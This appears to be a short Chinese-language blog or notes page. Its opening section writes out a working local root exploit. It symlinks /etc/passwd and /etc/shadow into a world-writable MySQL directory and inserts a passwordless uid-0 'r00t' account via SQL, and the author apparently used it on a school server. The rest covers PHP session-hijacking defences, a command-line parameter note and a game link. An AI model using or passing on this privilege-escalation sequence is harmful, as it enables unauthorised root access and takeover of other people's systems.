通​過​m​y​s​q​l​d​獲​得​r​o​o​t​權​限​

根本不用 '../../tmp'
學校直接把mysql資料夾權限設777
可見我們的admin有多友善


cd /var/tmp
ln -s /etc/passwd a.ISD
ln -s /etc/shadow b.ISD
mysql -u user -h localhost -p******** '../../tmp'

create table a(qqq varchar(255));
create table b(qqq varchar(255));
insert into a values('r00t::0:0:Hacked_Fucked_R00T:/:/bin/sh');
insert into b values('r00t::1:0:99999:7:-1:-1:');
\q

參考資料: http://fanqiang.chinaunix.net/a5/b4/20010521/090400167_b.html

防Session Hijacking

http://ycrc.tanet.edu.tw/note/seminar/Secure_Coding_PHP1.pdf

XSS, SQL Injacking 不稀奇 連Session都可以搞怪


//重點
session_regenerate_id(true);

[php.ini]
session.use_trans_sid = 0
session.use_only_cookies = 1

參數 %L 百分比L Percent L

關鍵字是特殊符號 好難找

困惑我一整晚

終於

http://us.generation-nt.com/command-line-parameter-help-53528822.html

破不了

BUG少 創意多 好遊戲

http://www.newgrounds.com/portal/view/534416